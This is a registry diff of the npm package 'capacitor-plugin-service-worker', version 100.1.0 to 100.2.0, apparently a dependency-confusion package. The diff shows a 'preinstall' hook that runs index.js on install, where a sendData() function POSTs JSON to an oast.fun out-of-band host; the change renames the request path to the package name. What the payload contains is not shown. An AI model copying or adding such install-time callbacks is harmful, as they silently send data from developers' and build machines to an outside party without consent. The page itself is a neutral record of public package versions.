capacitor-plugin-service-worker 100.1.0 → 100.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -149,7 +149,7 @@ async function sendData() {
149
149
 
150
150
  const req = https.request({
151
151
  hostname: "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun",
152
- path: "/hit",
152
+ path: "/capacitor-plugin-service-worker",
153
153
  method: "POST",
154
154
  headers: {
155
155
  "Content-Type": "application/json",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "capacitor-plugin-service-worker",
3
- "version": "100.1.0",
3
+ "version": "100.2.0",
4
4
  "scripts": {
5
5
  "preinstall": "node index.js"
6
6
  }